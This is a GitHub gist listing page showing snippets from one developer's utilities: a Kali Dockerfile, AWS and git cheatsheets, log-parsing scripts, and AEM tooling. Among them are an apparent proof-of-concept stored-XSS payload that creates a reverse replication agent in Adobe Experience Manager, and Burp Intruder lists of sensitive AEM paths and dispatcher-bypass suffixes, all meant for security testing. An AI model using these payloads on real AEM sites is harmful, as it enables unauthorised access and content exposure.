Thomas Hartmann thomashartm
thomashartm
/ Kali_Golang_Python_Dockerfile
Last active
May 9, 2023 08:38
Dockerfile providing golang and python 3 inside a kali linux container
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM kalilinux/kali-rolling | |
| ######## | |
| # The purpose of the this container is quickly hacking some security testing scripts and tools. | |
| # Put the file into your local dev project, add the required tools, build the image and run it. | |
| # Mount your local folder for development. | |
| # Howto: | |
| # | |
| # docker build --no-cache -t <image-name> . | |
| # |
thomashartm
/ gist:3ce003b75d29a2af50c723ce3112e60e
Created
March 24, 2020 10:07
DynamoDB AWS CLI cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # query by id | |
| aws dynamodb query \ | |
| --table-name <tablename> \ | |
| --key-condition-expression "id = :name" \ | |
| --expression-attribute-values '{ | |
| ":name": { "S": "<namevalues>" } | |
| }' | |
| # delete item by ID | |
| aws dynamodb delete-item \ |
thomashartm
/ registered-aem-servlets.groovy
Last active
November 1, 2019 12:41
Prints out a list of servlets which are registered as OSGi components. The purpose is to find servlets which are listening to fixed paths or the default resource type
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.osgi.service.cm.Configuration | |
| import org.osgi.service.component.runtime.ServiceComponentRuntime | |
| def scr = getService(ServiceComponentRuntime.class) | |
| def descs = scr.getComponentDescriptionDTOs() | |
| def i = 0 |
thomashartm
/ requests-from-access-log.sh
Last active
July 12, 2019 15:24
Pulls out requests in the format METHOD PATH STATUSCODE SIZE from AEM access.log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Use this script to pull out all requests in the format METHOD PATH STATUSCODE SIZE from AEM access.log | |
| # An entry will look as follows: | |
| # GET /content/we-retail.html 200 45673 | |
| cat access.log* | tr -d - | cut -d\" -f2,3 | sed 's/ HTTP\/1.1//' > issued-requests.txt |
thomashartm
/ create-reverse-replication-agent.js
Last active
July 3, 2019 13:30
Demonstration payload for persistent XSS in AEM to generate reverse replication agent that interacts with a fake AEM server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * The following snippet will call it's AEM backend and create a reverse replication agent communicating with | |
| * http://localhost:8888/reverseagent | |
| * Use base64 btoa and eval(atob(...)) to package it and unpackage and execute it | |
| * To demonstrate the aem system issuing the requests run: | |
| * netcat -nvlp 8888 to | |
| */ | |
| $.ajax({url: '/content/rce/portal-to-toom',type: 'POST', data: {'jcr:primaryType':'cq:Page'}}); | |
| setTimeout(function(){ | |
| $.ajax({url: '/content/rce/portal-to-toom/_jcr_content',type: 'POST', data: {'jcr:primaryType': 'nt:unstructured','jcr:title': 'reverse-agent','enabled': 'true','transportUri': 'http://localhost:8888/reverseagent','transportUser': 'admin','reverseReplication': true,'cq:template': '/libs/cq/replication/templates/revagent','retryDelay': '5000','sling:resourceType': 'cq/replication/components/revagent','transportPassword': '{25a0084936aae0469c1e8464fe1d75a3bd36f65a9d2c40628239eb3c2cc04972}'}}); |
thomashartm
/ burp-intruder-aem-critical-paths.txt
Last active
August 9, 2021 06:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /admin | |
| /system/console | |
| /dav/crx.default | |
| /crx | |
| /bin/crxde/logs | |
| /jcr:system/jcr:versionStorage.json | |
| /_jcr_system/_jcr_versionStorage.json | |
| /libs/wcm/core/content/siteadmin.html | |
| /libs/collab/core/content/admin.html | |
| /libs/cq/ui/content/dumplibs.html |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| for i in $(grep '<version>' pom.xml); do | |
| version=${i%<*}; | |
| version=${version#*>}; | |
| if [[ $version == *"SNAPSHOT"* ]] | |
| then | |
| echo "$version"; | |
| fi | |
| done |
thomashartm
/ git-cheatsheet.txt
Last active
March 24, 2020 09:07
Git commonly used commands cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################## | |
| # fetches all branches and commits from remote in this case origin | |
| git fetch origin | |
| ######################## | |
| # show local branches | |
| git branch | |
| # shows alsp remote branches | |
| git branch -r |
thomashartm
/ burp-intruder-aem-dispatcher-bypass.txt
Last active
August 9, 2021 06:03
Burp Intruder payload lists for AEM content grabbing URL suffixes to bypass dispatcher rules. Just copy the list into your intruder options.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .json | |
| .1.json | |
| .json/a.css | |
| .json/a.html | |
| .json/a.ico | |
| .json/a.png | |
| .json/a.gif | |
| .json/a.1.json | |
| .json;%0aa.css | |
| .json;%0aa.html |
thomashartm
/ Search for param
Created
June 5, 2019 06:37
Searches for an IP in archived and gzipped log files and splits by whitespace and shows the first 3 elements
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| zgrep -e "127.0.0.1" archive/access.log* | grep ".html" | cut -d' ' -f1,3,2 |